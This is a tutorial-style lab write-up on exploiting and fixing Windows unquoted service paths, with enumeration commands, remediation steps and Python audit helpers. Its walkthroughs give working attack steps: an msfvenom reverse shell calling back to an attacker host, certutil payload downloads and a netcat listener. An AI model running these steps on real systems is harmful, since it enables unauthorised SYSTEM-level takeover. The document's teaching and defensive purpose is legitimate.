What is an Unquoted Service Path
An unquoted service path is a vulnerability where the path to a service's executable contains spaces and is not enclosed in quotation marks. Because Windows then has to guess where the executable name ends, it can end up running a different executable than the one intended.
For example, take a service named service123 running with SYSTEM privileges. The service executable is located in:
[C:\Program Files\Crazy Services\First Service\service123.exe]
This service has the unquoted service path vulnerability because the path contains spaces and isn't enclosed in quotes. To take advantage of this vulnerability, the attacker first checks whether they have permission to write a file somewhere along the path. Once that is confirmed, the attacker creates a reverse shell executable using msfvenom and names it First.exe. The attacker then puts that malicious file in this path:
[C:\Program Files\Crazy Services\First.exe]
When the service is restarted, it’ll execute the file First.exe.
Since the service is what executes the malicious file, if the service is running with SYSTEM privileges it will give the attacker SYSTEM privileges. Also note that the attacker will need to find a way to start or restart the service in order to make it execute the new file. I will show you two different ways to start a service in the walkthroughs below.
Why does it do this?
Let's look back at the previous example and assume there is a service named service123 running this executable:
[C:\Program Files\Crazy Services\First Service\service123.exe]
When Windows resolves an unquoted service path, it follows a specific order: it tries each space-delimited prefix of the path in turn, appending .exe when the prefix has no extension, before it reaches the full path. For example, if it's looking for "service123.exe," it will try the following files in order (assuming the unquoted service path vulnerability is present):
- C:\Program.exe
- C:\Program Files\Crazy.exe
- C:\Program Files\Crazy Services\First.exe
- C:\Program Files\Crazy Services\First Service\service123.exe
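The search order above can be reproduced in code. The following Python is an added example (not from the original post): candidate_paths expands a service ImagePath the way Windows does when the path is unquoted, and directories_to_audit lists the directories a defender must confirm are not writable by standard users. Both function names are my own, and the example assumes the ImagePath holds only the executable path, with no arguments.

```python
import ntpath


def candidate_paths(image_path: str) -> list[str]:
    """Return the executables Windows tries, in order, for a service ImagePath.

    A quoted path is unambiguous, so only the quoted executable is tried.
    An unquoted path containing spaces is ambiguous: each space-delimited
    prefix is tried in turn (with .exe appended when the prefix has no
    extension) before the full path. Assumption: no arguments follow the path.
    """
    path = image_path.strip()
    if path.startswith('"'):
        closing = path.find('"', 1)
        return [path[1:closing]] if closing > 0 else [path[1:]]
    tokens = path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def directories_to_audit(image_path: str) -> list[str]:
    """Directories where a planted file would be picked up before the real
    executable; each must be non-writable by unprivileged users."""
    return [ntpath.dirname(c) for c in candidate_paths(image_path)[:-1]]


if __name__ == "__main__":
    # Constructed input matching the post's service123 scenario.
    svc = r"C:\Program Files\Crazy Services\First Service\service123.exe"
    for p in candidate_paths(svc):
        print(p)
    print("directories to audit:", directories_to_audit(svc))
```

For the service123 path this prints the same four candidates as the list above; quoting the path collapses the list to the single real executable.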
Walk-through (Method 1)
NOTE: The service needs to be started/restarted for the exploit to work. I will show two ways to start the service. Method one is starting the service with the “net start” command. Method two is by restarting the entire machine with the shutdown command.
Tools used: winpeas.exe
IPs: Kali – 10.0.2.11 | Windows – 10.0.2.15
Since this is a privilege escalation demo I’ll start off with a user level shell.
First, let's copy winpeas.exe over to enumerate the machine for privilege escalation vulns. Winpeas is a very handy tool that enumerates many different privilege escalation paths in Windows.
We use certutil.exe to copy winpeas over:
certutil.exe -urlcache -f http://<ip>/winpeas.exe winpeas.exe
The output of Winpeas.exe shows a service named vulnserv which has the unquoted service path vulnerability. It seems that we also have permissions to start the service.
winpeas.exe servicesinfo
Let's check what privileges the service is running with. Checking shows that it's running as LocalSystem:
sc qc vulnserv
Let's check if we can create files in any of the directories along the path:
type nul > "C:\Program Files\Vuln Services\test.exe"
We are able to create a file in the “Vuln Services” directory.
Now it's time for the exploitation. First we create a reverse shell executable named First.exe using msfvenom on Kali:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.2.11 LPORT=53 -f exe > First.exe
Next step is to bring over the reverse shell executable to the Windows machine.
certutil.exe -urlcache -f http://<ip>/First.exe First.exe
We need to place the executable in the proper directory so it executes when the service starts up.
move First.exe "C:\Program Files\Vuln Services\"
Before starting the service, start a netcat listener on your Kali machine:
nc -lnvp 53
Now let's start the service:
net start vulnserv
We get a reverse shell back on the netcat listener. Running whoami shows that we are NT AUTHORITY\SYSTEM.
SeShutdownPrivilege (Method 2)
SeShutdownPrivilege is a privilege a user might hold in Windows. It lets the user shut down or restart the machine with the shutdown command. This privilege is interesting in the context of security because it can be abused by attackers to perform malicious actions such as shutting down or restarting the system.
We're going to change up Method 1 a bit. Let's say we're able to put the reverse shell "First.exe" in the vulnerable path, but our user does NOT have permission to start the service.
How do we start the service now? Well, if the service has autostart enabled, that means it will automatically start when the machine is started or restarted.
Let’s try this out!
We’ll run winpeas again to see what it says:
winpeas.exe servicesinfo
It seems like we don’t have permissions to start the service but it is configured to autostart.
Since we don't have permission to restart the service, let's check if we have SeShutdownPrivilege. It seems like we do:
whoami /priv
NOTE: Don't let the "Disabled" fool you. We still have permission to shut down the machine. "Disabled" only means the privilege is present in our token but not currently switched on; it's a safety measure so that applications don't accidentally shut down the machine, and a program that needs the privilege enables it before use.
Now let's just repeat the exploitation steps from Method 1 up to the point where we start the service.
With our reverse shell in place, we can restart the machine.
shutdown /r
This will restart the computer in a minute or two.
Back on the netcat listener, we get a shell as NT AUTHORITY\SYSTEM.
Manual Enumeration
It's important to understand how to manually enumerate for unquoted service paths, since bringing over winpeas.exe isn't always possible.
This lists every service whose path is not quoted and is not under C:\Windows (the Windows directory is excluded because standard users can't write there). Any of these whose path also contains a space has the unquoted service path vulnerability:
wmic service get displayname,name,pathname,startmode | findstr /i /v "c:\windows\\" |findstr /i /v """
This applies the same filter but only keeps services that are also configured to autostart:
wmic service get displayname,name,pathname,startmode | findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
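The two findstr filters above can be turned into a small audit script. The following Python is an added example, not from the original post: it parses wmic output into rows, flags only the entries whose executable path is unquoted and actually contains a space (the findstr filters also list space-free paths, which are harmless), and prints the quoted ImagePath that fixes each one. The wmic output is a constructed sample, and the parser assumes wmic's layout of columns separated by runs of spaces with no spaces inside Name or StartMode.

```python
import re

# Constructed sample of `wmic service get displayname,name,pathname,startmode`
# output (not captured from the post's machine). Column alignment mimics wmic.
SAMPLE_WMIC_OUTPUT = r"""
DisplayName         Name        PathName                                                    StartMode
Vulnerable Service  vulnserv    C:\Program Files\Vuln Services\First Service\service.exe    Auto
Legacy Backup       backupsvc   C:\Program Files\Old Backup\backup.exe                      Manual
Windows Update      wuauserv    C:\Windows\system32\svchost.exe -k netsvcs -p               Manual
Vendor Agent        agentsvc    "C:\Program Files\Good Vendor\Agent\agent.exe" --service    Auto
Tiny Svc            tinysvc     C:\Tools\tinysvc.exe                                        Auto
"""

# wmic separates columns with runs of spaces; Name and StartMode never contain spaces.
ROW = re.compile(r"^(?P<display>\S.*?)\s{2,}(?P<name>\S+)\s{2,}(?P<path>\S.*?)\s{2,}(?P<mode>\S+)\s*$")


def is_unquoted_with_spaces(pathname: str) -> bool:
    """True when the executable part of an unquoted PathName contains a space.
    Paths under the Windows directory are skipped, as in the findstr filters."""
    p = pathname.strip()
    if p.startswith('"') or p.lower().startswith("c:\\windows\\"):
        return False
    exe_end = p.lower().find(".exe")
    exe_part = p if exe_end == -1 else p[:exe_end + 4]  # ignore any arguments
    return " " in exe_part


def quoted_image_path(pathname: str) -> str:
    """Remediated value: the executable in double quotes, arguments untouched."""
    p = pathname.strip()
    exe_end = p.lower().find(".exe")
    if p.startswith('"') or exe_end == -1:
        return p
    return f'"{p[:exe_end + 4]}"{p[exe_end + 4:]}'


def find_vulnerable_services(wmic_output: str, autostart_only: bool = False) -> list:
    """Parse wmic output and return the services a defender should remediate."""
    findings = []
    for line in wmic_output.splitlines():
        m = ROW.match(line.rstrip())
        if not m or m["name"] == "Name":  # header row or unparsable line
            continue
        if autostart_only and m["mode"].lower() != "auto":
            continue
        if is_unquoted_with_spaces(m["path"]):
            findings.append({"name": m["name"], "path": m["path"],
                             "startmode": m["mode"], "fix": quoted_image_path(m["path"])})
    return findings
```

Calling find_vulnerable_services(SAMPLE_WMIC_OUTPUT) returns vulnserv and backupsvc with their fixed ImagePath values; with autostart_only=True only vulnserv remains, mirroring the second wmic one-liner.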
Fixing the Vulnerability
As fun as it is to exploit vulnerabilities, it's also important to understand how to fix them.
To summarize, this is the goal:
Before: C:\Program Files\Vuln Services\First Service\service.exe
After: "C:\Program Files\Vuln Services\First Service\service.exe"
To fix this from the very beginning, create your service like this:
sc.exe create vulnserv binPath='"C:\Program Files\Vuln Services\First Service\service.exe"'
Notice the single quotes outside the double quotes.
If you want to fix the vulnerability on an already created service, open Registry Editor as an Administrator.
Then, at the top, navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vulnserv (vulnserv is the name of the vulnerable service).
Right-click on ImagePath, click Modify, and add quotes around the path.
Now let's double check with winpeas.exe. Sure enough, it no longer shows the vulnerability.
Steps to recreate Vulnerability
Tools: subinacl.exe
Start up cmd prompt as an Administrator.
First, create the directory where your service executable will be. Make sure the directory path looks similar to the one below; it should have some spaces.
mkdir "C:\Program Files\Vuln Services\First Service"
Then create the service and set the binary path to an executable inside the directory you just created.
sc.exe create vulnserv binPath="C:\Program Files\Vuln Services\First Service\service.exe"
If you want to create the service with auto start, add start=auto to the end.
sc create vulnserv binPath="C:\Program Files\Vuln Services\First Service\service.exe" start=auto
If you want to confirm that the service was created, do:
sc qc vulnserv
Next step is to give users permissions to create files in the “Vuln Services” directory.
Go to the "Vuln Services" directory where the service is stored, right-click it and go to the Security tab. From there scroll down, click on Users and click Edit.
From here, click on Users again and click the Full control option to give Users full permissions.
A new user should already have SeShutdownPrivilege, so you're able to test Method 2. But if you want to try Method 1, use the tool subinacl.exe. Do the following to give a user permission to start the service:
subinacl.exe /service vulnserv /grant=user1=PTOC
Now switch to the unprivileged user, open command prompt and try to PWN it.